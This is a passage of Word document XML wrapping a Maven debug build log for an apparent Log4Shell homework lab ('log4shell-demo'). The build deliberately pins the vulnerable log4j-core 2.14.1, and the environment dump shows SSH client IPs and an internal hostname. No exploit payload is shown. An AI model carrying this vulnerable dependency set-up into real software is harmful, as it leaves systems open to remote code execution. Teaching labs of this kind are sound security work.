      </w:r>
    </w:p>
    <w:p w14:paraId="1142F6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no use filter components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6405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20E64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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C07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mirror maven-default-http-blocker (http://0.0.0.0/) for ow2-snapshot (http://repository.ow2.org/nexus/content/repositories/snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EDD7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Dependency collection stats {ConflictMarker.analyzeTime=241208, ConflictMarker.markTime=158939, ConflictMarker.nodeCount=118, ConflictIdSorter.graphTime=4510752, ConflictIdSorter.topsortTime=134348, ConflictIdSorter.conflictIdCount=45, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=2309753, ConflictResolver.conflictItemCount=72, DefaultDependencyCollector.collectTime=195974963, DefaultDependencyCollector.transformTime=7384173}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976A8C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org.apache.maven.plugins:maven-compiler-plugin:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68360A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org.apache.maven:maven-plugin-api:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4458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org.apache.maven:maven-model:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509D5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org.sonatype.sisu:sisu-inject-plexus:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45482A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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C91BB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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD88D6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org.apache.maven:maven-artifact:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B632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org.codehaus.plexus:plexus-utils:jar:2.0.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA80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org.apache.maven:maven-core:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F09D02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org.apache.maven:maven-settings:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16829C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org.apache.maven:maven-settings-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB496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org.apache.maven:maven-repository-metadata:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F84E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org.apache.maven:maven-model-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC655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org.apache.maven:maven-aether-provider:jar:3.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327EB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org.sonatype.aether:aether-impl:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81AE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org.sonatype.aether:aether-spi:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631884F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org.sonatype.aether:aether-api:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0CF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org.sonatype.aether:aether-util:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018BC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org.codehaus.plexus:plexus-interpolation:jar:1.14:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7016BCF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org.codehaus.plexus:plexus-classworlds:jar:2.2.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BB9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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E1998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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB3A2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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148335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org.apache.maven.shared:maven-shared-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AC0E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commons-io:commons-io:jar:2.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEFEB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org.apache.maven.shared:maven-shared-incremental:jar:1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D93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org.codehaus.plexus:plexus-java:jar:0.9.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAE85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org.ow2.asm:asm:jar:6.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D190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com.thoughtworks.qdox:qdox:jar:2.0-M9:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5B6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org.codehaus.plexus:plexus-compiler-api:jar:2.8.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700A6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org.codehaus.plexus:plexus-compiler-manager:jar:2.8.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0962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org.codehaus.plexus:plexus-compiler-javac:jar:2.8.4:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626BA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Created new class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D859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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F640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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612A75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Populating class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA4CE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org.apache.maven.plugins:maven-compiler-plugin:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24544E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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AA0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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EAF2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org.codehaus.plexus:plexus-utils:jar:2.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6257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org.sonatype.aether:aether-util:jar:1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD2DD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org.codehaus.plexus:plexus-interpolation:jar:1.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84CA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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A51DE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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E182E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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1367FE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org.apache.maven.shared:maven-shared-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D8C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commons-io:commons-io:jar:2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1227522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org.apache.maven.shared:maven-shared-incremental:jar:1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098664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org.codehaus.plexus:plexus-java:jar:0.9.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFCD4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org.ow2.asm:asm:jar:6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7033E0B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com.thoughtworks.qdox:qdox:jar:2.0-M9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114062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org.codehaus.plexus:plexus-compiler-api:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0FFE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org.codehaus.plexus:plexus-compiler-manager:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A915F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org.codehaus.plexus:plexus-compiler-javac:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBD7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org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C18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'org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266502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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C302A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(f) buildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE40F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compilePath = [/home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BB9C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compileSourceRoots = [/home/ec2-user/log4shell-homework/src/main/java]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54528F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compilerId = javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F139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(f) debug = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FCB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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABA50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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E60F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failOnWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE15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forceJavacCompilerUse = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD5D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fork = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8928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generatedSourcesDirectory = /home/ec2-user/log4shell-homework/target/generated-sources/annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549D2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mojoExecution = org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile {execution: default-compile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C18B9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optimize = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D53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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA86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parameters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32097F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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BAC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projectArtifact = com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF4E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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E07C9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showDeprecation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC860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showWarnings = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713D17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skipMultiThreadWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC080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source = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27055F1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staleMillis = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D932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target = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA40A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useIncrementalCompilation = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930D2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verbose = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511065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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05B5F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compiler 'javac'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2226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3C21A8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2496A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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599A8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Configuring mojo org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E9B7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'org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33F5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addDefaultExcludes = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364596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buildFilters = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC63A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delimiters = [@]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED167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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6269779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escapeWindowsPaths = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031CC6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fileNameFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED5CA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includeEmptyDirs = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A08A5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outputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1A7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overwrite = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261CE0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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D295D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propertiesEncoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F948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resources = [Resource {targetPath: null, filtering: false, FileSet {directory: /home/ec2-user/log4shell-homework/src/test/resources, PatternSet [includes: {}, excludes: {}]}}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B72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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1919A2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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077F70B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supportMultiLineFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1411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useBuildFilters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000229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useDefaultDelimiters = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E081E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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896B6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properties used {spring-integration.version=5.5.4, flyway.version=7.7.3, java.specification.version=17, webjars-hal-browser.version=3325375, java.vendor.url=https://aws.amazon.com/corretto/, sun.boot.library.path=/usr/lib/jvm/java-17-amazon-corretto.x86_64/lib, sun.java.command=org.codehaus.plexus.classworlds.launcher.Launcher clean package -X, jdk.debug=release, maven.version=3.8.4, javax-activation.version=1.2.0, kafka.version=2.7.1, jboss-transaction-spi.version=7.6.1.Final, java.vm.specification.vendor=Oracle Corporation, java.specification.name=Java Platform API Specification, byte-buddy.version=1.10.22, maven-install-plugin.version=2.5.2, env.which_declare=declare -f, java.runtime.version=17.0.15+6-LTS, httpclient5.version=5.0.4, env.SELINUX_ROLE_REQUESTED=, java.vendor.version=Corretto-17.0.15.6.1, env.HISTCONTROL=ignoredups, micrometer.version=1.7.4, rxjava-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>adapter.version=1.2.1, project.baseUri=file:/home/ec2-user/log4shell-homework/, hibernate.version=5.4.32.Final, java.io.tmpdir=/tmp, java.version=17.0.15, javax-persistence.version=2.2, jakarta-ws-rs.version=2.1.6, build-helper-maven-plugin.version=3.2.0, mockito.version=3.9.0, java.vm.specification.name=Java Virtual Machine Specification, infinispan.version=12.1.7.Final, nekohtml.version=1.9.22, maven-assembly-plugin.version=3.3.0, native.encoding=UTF-8, java.library.path=/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib, jakarta-servlet.version=4.0.4, java.vendor=Amazon.com Inc., java.specification.maintenance.version=1, thymeleaf-extras-java8time.version=3.0.4.RELEASE, undertow.version=2.2.10.Final, mariadb.version=2.7.4, selenium-htmlunit.version=2.49.1, thymeleaf-extras-data-attribute.version=2.0.1, ehcache3.version=3.9.6, jakarta-xml-bind.version=2.3.3, commons-dbcp2.version=2.8.0, env.LANG=C.UTF-8, mongodb.version=4.2.3, java.vm.specification.version=17, javax-transaction.version=1.3, maven.compiler.source=11, env.BASH_FUNC_which%%=() {  ( alias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1E2A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eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F16F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user.home=/home/ec2-user, postgresql.version=42.2.23, reactive-streams.version=1.0.3, env.DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus, jmustache.version=1.15, querydsl.version=4.4.0, appengine-sdk.version=1.9.91, thymeleaf-layout-dialect.version=2.5.3, hamcrest.version=2.2, os.version=6.1.134-152.225.amzn2023.x86_64, commons-pool.version=1.6, jakarta-jms.version=2.0.3, jakarta-transaction.version=1.3.3, env.MAIL=/var/spool/mail/ec2-user, java.vm.name=OpenJDK 64-Bit Server VM, maven-help-plugin.version=3.2.0, mimepull.version=1.9.15, json-path.version=2.5.0, jaxen.version=1.2.0, johnzon.version=1.2.14, os.arch=amd64, spring-batch.version=4.3.3, couchbase-client.version=3.1.7, derby.version=10.14.2.0, javax-jsonb.version=1.0, rxjava2.version=2.2.21, javax-jaxws.version=2.3.1, json-smart.version=2.4.7, javax-websocket.version=1.1, commons-codec.version=1.15, caffeine.version=2.9.2, h2.version=1.4.200, env.JAVA_HOME=/usr/lib/jvm/java-17, java.vm.compressedOopsMode=32-bit, pooled-jms.version=1.2.2, unboundid-ldapsdk.version=4.0.14, thymeleaf-extras-springsecurity.version=3.0.4.RELEASE, javax-jaxb.version=2.3.1, sqlite-jdbc.version=3.34.0, jakarta-servlet-jsp-jstl.version=1.2.7, activemq.version=5.16.3, httpasyncclient.version=4.1.4, jtds.version=1.3.1, javax-jms.version=2.0.1, jakarta-websocket.version=1.1.2, env.LOGNAME=ec2-user, spring-security.version=5.5.2, hibernate-validator.version=6.2.0.Final, assertj.version=3.19.0, jakarta-xml-soap.version=1.4.2, influxdb-java.version=2.21, httpcore5.version=5.1.1, lombok.version=1.18.20, maven.compiler.target=11, jakarta-xml-ws.version=2.3.3, env.S_COLORS=auto, library.jansi.path=/usr/share/maven/lib/jansi-native, env.XDG_SESSION_CLASS=user, commons-pool2.version=2.9.0, jackson-bom.version=2.12.5, env.VIRTUAL_ENV=/home/ec2-user/log4shell-homework/venv, spring-retry.version=1.3.1, maven-invoker-plugin.version=3.2.2, maven-antrun-plugin.version=1.8, maven.conf=/usr/share/maven/conf, sun.java.launcher=SUN_STANDARD, resource.delimiter=@, javax-json.version=1.1.4, jboss-logging.version=3.4.2.Final, maven-resources-plugin.version=3.2.0, javax-validation.version=2.0.1.Final, netty.version=4.1.68.Final, jetty-jsp.version=2.2.0.v201112011158, maven-source-plugin.version=3.2.1, jetty.version=9.4.43.v20210629, rxjava.version=1.3.8, elasticsearch.version=7.12.1, java.runtime.name=OpenJDK Runtime Environment, env.XDG_SESSION_ID=8, rest-assured.version=4.3.3, env.SYSTEMD_COLORS=false, maven-deploy-plugin.version=2.8.2, env.MAVEN_CMD_LINE_ARGS= clean package -X, log4j2.version=2.14.1, maven-failsafe-plugin.version=2.22.2, spring-framework.version=5.3.10, dropwizard-metrics.version=4.1.25, git-commit-id-plugin.version=4.0.5, kotlin-coroutines.version=1.5.2, hazelcast-hibernate5.version=2.2.1, htmlunit.version=2.49.1, env.TERM=xterm-256color, sun.arch.data.model=64, spring-restdocs.version=2.0.5.RELEASE, freemarker.version=2.3.31, thymeleaf.version=3.0.12.RELEASE, jakarta-json.version=1.1.6, janino.version=3.1.6, maven-jar-plugin.version=3.2.0, maven-compiler-plugin.version=3.8.1, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>java.specification.vendor=Oracle Corporation, rabbit-amqp-client.version=5.12.0, java.version.date=2025-04-15, spring-amqp.version=2.3.10, java.home=/usr/lib/jvm/java-17-amazon-corretto.x86_64, maven-war-plugin.version=3.3.2, jolokia.version=1.6.2, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, jetty-reactive-httpclient.version=1.1.10, env.PATH=/home/ec2-user/log4shell-homework/venv/bin:/home/ec2-user/.local/bin:/home/ec2-user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin, maven-dependency-plugin.version=3.1.2, httpclient.version=4.5.13, env.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:, jsonassert.version=1.5.0, file.encoding=UTF-8, gson.version=2.8.8, sun-mail.version=1.6.7, jakarta-annotation.version=1.3.5, env.HOSTNAME=ip-172-31-46-85.us-east-2.compute.internal, env.SHLVL=1, mssql-jdbc.version=9.2.1.jre8, snakeyaml.version=1.28, okhttp3.version=3.14.9, liquibase.version=4.3.5, httpcore.version=4.4.14, lettuce.version=6.1.5.RELEASE, classworlds.conf=/usr/share/maven/bin/m2.conf, sun.io.unicode.encoding=UnicodeLittle, kotlin.version=1.5.31, wsdl4j.version=1.6.3, tomcat.version=9.0.53, sendgrid.version=4.7.5, env.SSH_CLIENT=76.141.92.20 44903 22, glassfish-jaxb.version=2.3.5, spring-ws.version=3.1.1, commons-lang3.version=3.12.0, os.name=Linux, junit.version=4.13.2, jetty-el.version=9.0.52, env.SELINUX_USE_CURRENT_RANGE=, db2-jdbc.version=11.5.6.0, maven.build.timestamp=2025-05-29T00:37:14Z, env.SSH_CONNECTION=76.141.92.20 44903 172.31.46.85 22, reactor-bom.version=2020.0.11, maven-enforcer-plugin.version=3.0.0, jstl.version=1.2, quartz.version=2.3.2, javax-money.version=1.1, spring-hateoas.version=1.3.4, path.separator=:, env.SHELL=/bin/bash, jakarta-validation.version=2.0.2, env.HISTSIZE=1000, maven.multiModuleProjectDirectory=/home/ec2-user/log4shell-homework, oracle-database.version=21.1.0.0, env.MAVEN_PROJECTBASEDIR=/home/ec2-user/log4shell-homework, java.vm.info=mixed mode, sharing, cassandra-driver.version=4.11.3, env.USER=ec2-user, java.class.version=61.0, xml-maven-plugin.version=1.0.2, sun.jnu.encoding=UTF-8, xmlunit2.version=2.8.2, jakarta-mail.version=1.6.7, slf4j.version=1.7.32, r2dbc-bom.version=Arabba-SR10, solr.version=8.8.2, saaj-impl.version=1.5.3, nimbus-jose-jwt.version=9.10.1, maven.build.version=Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5), hikaricp.version=4.0.3, maven.home=/usr/share/maven, netty-tcnative.version=2.0.43.Final, maven-shade-plugin.version=3.2.4, sun.stderr.encoding=UTF-8, jakarta-json-bind.version=1.0.2, file.separator=/, line.separator=</w:t>
      </w:r>
    </w:p>
